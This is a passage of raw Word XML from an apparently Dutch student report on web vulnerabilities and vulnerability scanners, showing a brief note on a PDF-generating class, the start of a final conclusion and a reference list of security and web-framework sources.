                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>PDFGenerator</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>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0E3238" w:rsidRDefault="000E3238">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7"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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="37798B9B" w14:textId="02ED77D0" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:r>
                        <w:t xml:space="preserve">De component om rapporten mee te genereren wordt gedaan door de Klasse </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>PDFGenerator</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve">. Deze klasse gebruikt de Library Html2PDF dat Html documenten naar pdf-documenten converteert. Op de volgende pagina kunt u een code </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>snippet</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve">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22">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0E3238" w:rsidRDefault="000E3238">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58"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="15406555" w14:textId="54443C47" w:rsidR="000E3238" w:rsidRDefault="000E3238">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23">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0E3238" w:rsidRDefault="000E3238">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59"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3791B35C" w14:textId="3C1AC909" w:rsidR="000E3238" w:rsidRDefault="000E3238">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24">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0E3238" w:rsidRDefault="000E3238">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0"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Nbo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2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OZjzW6OAgAAjgUAAA4AAAAAAAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0A&#10;FAAGAAgAAAAhAN1HpqnfAAAACQEAAA8AAAAAAAAAAAAAAAAA5gQAAGRycy9kb3ducmV2LnhtbFBL&#10;BQYAAAAABAAEAPMAAADyBQAAAAA=&#10;" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="32C707A1" w14:textId="745858F5" w:rsidR="000E3238" w:rsidRDefault="000E3238">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9B8F"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241096">
          <w:headerReference w:type="default" r:id="rId125"/>
          <w:headerReference w:type="first" r:id="rId126"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="402" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:bookmarkStart w:id="59" w:name="_Toc496292468"/>
    <w:p w14:paraId="6D6D44CB" w14:textId="6682B1CA" w:rsidR="00344273" w:rsidRPr="00AC06C2" w:rsidRDefault="007460D6"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10F537AC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-899795</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-902335</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63E1" id="Rectangle 841" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.85pt;margin-top:-71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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00AC06C2" w:rsidRPr="00AC06C2">
        <w:t>Eindconclusie</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>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A99D8A0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-10795</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>216535</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5778500" cy="7769860"/>
                <wp:effectExtent l="0" t="0" r="0" b="254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76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0B071F5D" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                            <w:r>
                              <w:t>Aan de hand van mijn onderzoek en Proof of Concept zal ik antwoord geven op de onderstaande hoofdvraag die aan het begin van dit project is vastgesteld.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="27EEB0F3" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E3238"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0E3238" w:rsidRDefault="000E3238">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="5BF5AE5A" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">Hiervoor heb ik onderzoek gedaan naar drie onderwerpen. De drie onderwerpen zijn: web kwetsbaarheden, webapplicatie scanners en technologieën. </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="47EE461C" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="69E0B1EF" w14:textId="7B2EA7F4" w:rsidR="000E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="7A1F920D" w14:textId="3E5DDF6A" w:rsidR="000E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="4220A2AB" w14:textId="565ED92C" w:rsidR="000E3238" w:rsidRPr="007C4606" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="747D291D" w14:textId="7F0F32D2" w:rsidR="000E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238"/>
                          <w:p w14:paraId="4D2A2CE5"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EF51F" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m0,0l0,21600,21600,21600,21600,0xe">
                <v:stroke joinstyle="miter"/>
                <v:path gradientshapeok="t" o:connecttype="rect"/>
              </v:shapetype>
              <v:shape id="Text Box 800" o:spid="_x0000_s1261" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-.85pt;margin-top:17.05pt;width:455pt;height:611.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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="70C544C3" w14:textId="0B071F5D" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:r>
                        <w:t>Aan de hand van mijn onderzoek en Proof of Concept zal ik antwoord geven op de onderstaande hoofdvraag die aan het begin van dit project is vastgesteld.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="27EEB0F3" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E3238"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0E3238" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="5BF5AE5A" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">Hiervoor heb ik onderzoek gedaan naar drie onderwerpen. De drie onderwerpen zijn: web kwetsbaarheden, webapplicatie scanners en technologieën. </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="47EE461C" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="69E0B1EF" w14:textId="7B2EA7F4" w:rsidR="000E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="7A1F920D" w14:textId="3E5DDF6A" w:rsidR="000E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="4220A2AB" w14:textId="565ED92C" w:rsidR="000E3238" w:rsidRPr="007C4606" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="747D291D" w14:textId="7F0F32D2" w:rsidR="000E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238"/>
                    <w:p w14:paraId="4D2A2CE5" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E3238"/>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bookmarkStart w:id="60" w:name="_Toc496292469"/>
    <w:p w14:paraId="0D846ECE" w14:textId="2D753832"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4A912"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bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w14:paraId="4AFB14B2" w14:textId="34D9D27E" w:rsidR="007D3A19" w:rsidRPr="0030691F" w:rsidRDefault="007D3A19" w:rsidP="007D3A19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EDA7A7B" w14:textId="77777777" w:rsidR="00D877E4" w:rsidRDefault="00B534F2" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve">Securi </w:t>
      </w:r>
      <w:r w:rsidR="00257E5A" w:rsidRPr="00CC5BFC">
        <w:t>(2016). Website Hacked Trend Report.</w:t>
      </w:r>
      <w:r w:rsidR="00921538" w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t>Geraadpleegd van</w:t>
      </w:r>
      <w:r w:rsidR="002E7D5C" w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9B9FB1" w14:textId="2E99986D" w:rsidR="00886D84" w:rsidRDefault="00D85C27" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId127" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00CC5BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://sucuri.net/website-security/Reports/Sucuri-Website-Hacked-Report-2016Q1.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0BB4221A" w14:textId="77777777" w:rsidR="0030691F" w:rsidRPr="00CC5BFC" w:rsidRDefault="0030691F" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15C703FD" w14:textId="77777777" w:rsidR="0030691F" w:rsidRDefault="00B534F2" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t>IBM Security (Maart, 2017). IBM X-Force Threat Intelligence Index 2017. Geraadpleegd van</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694A0E62" w14:textId="0EF0C985" w:rsidR="00886D84" w:rsidRDefault="00B534F2" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:hyperlink r:id="rId128" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00CC5BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://assets.documentcloud.org/documents/3527813/IBM-XForce-Index-2017-FINAL.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="188D0774" w14:textId="77777777" w:rsidR="0030691F" w:rsidRPr="00CC5BFC" w:rsidRDefault="0030691F" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BEDD95F" w14:textId="77777777" w:rsidR="0030691F" w:rsidRDefault="00B534F2" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve">IBM Security (2014). IBM X-Force Threat Intelligence Quarterly </w:t>
      </w:r>
      <w:r w:rsidR="00FF0482" w:rsidRPr="00CC5BFC">
        <w:t>2Q 2014. Geraadpleegd van</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5916B192" w14:textId="5EB8D313" w:rsidR="00886D84" w:rsidRDefault="00FF0482" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B534F2" w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId129" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00CC5BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>http://essextec.com/wp-content/uploads/2015/09/xforcereport2q2014.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7563B5F8" w14:textId="77777777" w:rsidR="0030691F" w:rsidRPr="00CC5BFC" w:rsidRDefault="0030691F" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73865744" w14:textId="77777777" w:rsidR="0030691F" w:rsidRDefault="00C674E1" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP (2017). OWASP Top Ten Project, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5BFC">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Geraadpleegd</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5BFC">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> van</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652D4323" w14:textId="03CEC3F8" w:rsidR="00886D84" w:rsidRDefault="00C674E1" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5BFC">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:hyperlink r:id="rId130" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00CC5BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D48DA37" w14:textId="77777777" w:rsidR="0030691F" w:rsidRPr="00CC5BFC" w:rsidRDefault="0030691F" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E40A2BD" w14:textId="77777777" w:rsidR="0030691F" w:rsidRDefault="004E2F5B" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t>Sectoolmarket (2016). Price and feature Comparison of Web Application Scanners. Geraadpleegd van</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147571E1" w14:textId="00AFF57F" w:rsidR="00886D84" w:rsidRDefault="004E2F5B" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C674E1" w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId131" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00CC5BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>http://www.sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3EE831D8" w14:textId="77777777" w:rsidR="0030691F" w:rsidRPr="00CC5BFC" w:rsidRDefault="0030691F" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7969AB87" w14:textId="77777777" w:rsidR="0030691F" w:rsidRDefault="004E2F5B" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t>Voogd K. (2011). Het Web: Web 1.0, Web 2.0, Web 3.0. Geraadpleegd van</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789E883F" w14:textId="65E64231" w:rsidR="00886D84" w:rsidRDefault="004E2F5B" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId132" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00CC5BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>http://pc-en-internet.infonu.nl/geschiedenis/84250-het-web-web-10-web-20-web-30.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6CCCF858" w14:textId="77777777" w:rsidR="0030691F" w:rsidRPr="00CC5BFC" w:rsidRDefault="0030691F" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D86499C" w14:textId="77777777" w:rsidR="0030691F" w:rsidRDefault="00797560" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t>OWASP (2017). Vulnerability Scanning Tools. Geraadpleegd van</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE70FA8" w14:textId="33C2D085" w:rsidR="00886D84" w:rsidRDefault="00797560" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId133" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00CC5BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0E602FBF" w14:textId="77777777" w:rsidR="0030691F" w:rsidRPr="00CC5BFC" w:rsidRDefault="0030691F" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53C658E7" w14:textId="77777777" w:rsidR="0030691F" w:rsidRDefault="00797560" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t>Acunetix (2017) Is your website hackable? Geraadpleegd van</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A509824" w14:textId="7B4D86E8" w:rsidR="00886D84" w:rsidRDefault="00797560" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:hyperlink r:id="rId134" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00CC5BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://www.acunetix.com/resources/wvsbrochure.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1B147BE5" w14:textId="77777777" w:rsidR="0030691F" w:rsidRPr="00CC5BFC" w:rsidRDefault="0030691F" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BE1BAEF" w14:textId="77777777" w:rsidR="0030691F" w:rsidRDefault="00797560" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t>Schäferhoff N. (2016). 13 Surprising Wordpress Statistics. Geraadpleegd van</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E97D83" w14:textId="1DCD4C40" w:rsidR="00886D84" w:rsidRDefault="00797560" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId135" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00CC5BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://torquemag.io/2016/10/13-surprising-wordpress-statistics-updated-2016/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="67F2FC9A" w14:textId="77777777" w:rsidR="0030691F" w:rsidRPr="00CC5BFC" w:rsidRDefault="0030691F" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="683D6F2F" w14:textId="77777777" w:rsidR="0030691F" w:rsidRDefault="00797560" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t>Wright K. Ithemes (2017). 5 Common WordPress Security Issues</w:t>
      </w:r>
      <w:r w:rsidR="00315FD7" w:rsidRPr="00CC5BFC">
        <w:t>. Geraadpleegd van</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0880DBAA" w14:textId="17DF567D" w:rsidR="00886D84" w:rsidRDefault="00315FD7" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00797560" w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId136" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00CC5BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://ithemes.com/2017/01/16/wordpress-security-issues/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6FD1997A" w14:textId="77777777" w:rsidR="0030691F" w:rsidRPr="00CC5BFC" w:rsidRDefault="0030691F" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E05A8EA" w14:textId="77777777" w:rsidR="0030691F" w:rsidRDefault="00315FD7" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t>Techempower (2017). Web Framework Benchmarks. Geraadpleegd van</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5277D0C3" w14:textId="6A2DF8FD" w:rsidR="00886D84" w:rsidRDefault="00315FD7" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:hyperlink r:id="rId137" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00CC5BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://www.techempower.com/benchmarks/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="56F9CEFC" w14:textId="77777777" w:rsidR="0030691F" w:rsidRPr="00CC5BFC" w:rsidRDefault="0030691F" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00B5F5FA" w14:textId="77777777" w:rsidR="0030691F" w:rsidRDefault="00315FD7" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t>Sitepoint (2015). The Best PHP Framework for 2015: SitePoint Survey Results. Geraadpleegd van</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5990B808" w14:textId="5FAA3928" w:rsidR="00886D84" w:rsidRDefault="00315FD7" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:hyperlink r:id="rId138" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00CC5BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://www.sitepoint.com/best-php-framework-2015-sitepoint-survey-results/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="48868884" w14:textId="77777777" w:rsidR="0030691F" w:rsidRPr="00CC5BFC" w:rsidRDefault="0030691F" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="205F9C5C" w14:textId="77777777" w:rsidR="0030691F" w:rsidRDefault="00315FD7" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
